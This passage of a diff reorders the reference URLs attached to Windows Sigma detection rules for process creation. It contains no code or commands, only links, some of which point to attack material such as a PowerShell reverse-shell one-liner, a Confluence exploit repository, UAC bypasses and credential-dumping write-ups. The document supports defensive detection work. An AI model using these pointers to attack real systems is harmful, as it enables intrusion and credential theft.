"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "Reegun J (OCBC Bank)", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" ], "tags": [ @@ -36759,9 +36783,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/netero1010/TrustedPath-UACBypass-BOF", - "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" ], "tags": [ @@ -36794,8 +36818,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" ], "tags": [ @@ -36828,8 +36852,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" @@ -36875,8 +36899,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/Hexacorn/status/1420053502554951689", - "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" ], "tags": [ @@ -36997,9 +37021,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/issues/1009", "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" ], "tags": [ @@ -37081,8 +37105,8 @@ "refs": [ "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ @@ -37312,8 +37336,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" ], "tags": [ @@ -37387,8 +37411,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", "https://github.com/mandiant/SharPersist", + "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" ], "tags": [ @@ -37802,8 +37826,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", "https://twitter.com/0gtweet/status/1457676633809330184", + "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" ], "tags": [ @@ -37871,8 +37895,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" ], "tags": [ @@ -37928,11 +37952,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" ], "tags": [ @@ -38012,8 +38036,8 @@ "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd.html", - "https://www.nirsoft.net/utils/nircmd2.html#using", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.nirsoft.net/utils/nircmd2.html#using", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" ], "tags": [ @@ -38241,8 +38265,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/harr0ey/status/989617817849876488", "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", + "https://twitter.com/harr0ey/status/989617817849876488", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" ], "tags": [ @@ -38586,9 +38610,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/binderlabs/DirCreate2System", - "https://www.echotrail.io/insights/search/wermgr.exe", "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" ], "tags": "No established tags" @@ -38677,10 +38701,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", + "https://twitter.com/Hexacorn/status/1187143326673330176", "https://redcanary.com/blog/raspberry-robin/", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://twitter.com/Hexacorn/status/1187143326673330176", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" ], "tags": [ @@ -38816,8 +38840,8 @@ "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" ], @@ -39079,9 +39103,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" ], "tags": [ @@ -39504,8 +39528,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", "https://ss64.com/vb/cscript.html", + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" ], "tags": [ @@ -39611,8 +39635,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" ], "tags": [ @@ -39636,9 +39660,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.poweradmin.com/paexec/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" ], "tags": [ @@ -39671,8 +39695,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" ], "tags": [ @@ -39705,8 +39729,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1278977301745741825", "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" ], "tags": [ @@ -39772,14 +39796,14 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://twitter.com/Hexacorn/status/776122138063409152", "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", "https://twitter.com/gN3mes1s/status/941315826107510784", "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml" ], "tags": [ @@ -39821,9 +39845,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml" ], "tags": [ @@ -39890,8 +39914,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml" ], "tags": [ @@ -39915,9 +39939,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" ], "tags": [ @@ -39952,8 +39976,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/nao_sec/status/1530196847679401984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" ], "tags": [ @@ -40117,8 +40141,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1207671369963646976", "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://twitter.com/SBousseaden/status/1207671369963646976", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" ], "tags": [ @@ -40206,11 +40230,11 @@ "logsource.product": "windows", "refs": [ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" ], "tags": [ @@ -40260,9 +40284,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" ], "tags": [ @@ -40363,8 +40387,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" ], "tags": [ @@ -40390,8 +40414,8 @@ "logsource.product": "windows", "refs": [ "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", - "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" ], "tags": [ @@ -40435,8 +40459,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/max_mal_/status/1542461200797163522", - "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" ], @@ -40495,8 +40519,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", - "https://ss64.com/nt/dsacls.html", "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", + "https://ss64.com/nt/dsacls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ @@ -40529,9 +40553,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/h3v0x/CVE-2021-26084_Confluence", "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://github.com/h3v0x/CVE-2021-26084_Confluence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" ], "tags": [ @@ -40640,9 +40664,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" ], "tags": [ @@ -40768,10 +40792,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" ], "tags": [ @@ -40925,9 +40949,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_felamos/status/1204705548668555264", - "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", + "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://twitter.com/_felamos/status/1204705548668555264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" ], "tags": [ @@ -40960,8 +40984,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ @@ -41109,8 +41133,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://www.echotrail.io/insights/search/wusa.exe/", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" ], "tags": [ @@ -41199,8 +41223,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" ], "tags": [ @@ -41358,8 +41382,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" ], "tags": [ @@ -41472,9 +41496,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/filip_dragovic/status/1590052248260055041", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120", "https://twitter.com/filip_dragovic/status/1590104354727436290", + "https://twitter.com/filip_dragovic/status/1590052248260055041", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml" ], "tags": "No established tags" @@ -41528,9 +41552,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/", "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/", - "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml" ], "tags": [ @@ -41708,8 +41732,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/ReaQta/status/1222548288731217921", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://twitter.com/ReaQta/status/1222548288731217921", "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", "https://www.activecyber.us/activelabs/windows-uac-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" @@ -41745,9 +41769,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", - "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", + "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", + "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" ], "tags": [ @@ -41843,8 +41867,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vysecurity/status/977198418354491392", "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" ], "tags": [ @@ -41878,8 +41902,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" ], "tags": [ @@ -42021,8 +42045,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "Turla has used fsutil fsinfo drives to list connected drives.", "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", + "Turla has used fsutil fsinfo drives to list connected drives.", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" ], "tags": [ @@ -42214,15 +42238,15 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", - "https://github.com/Neo23x0/Raccine#the-process", - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", "https://blog.talosintelligence.com/2017/05/wannacry.html", "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + 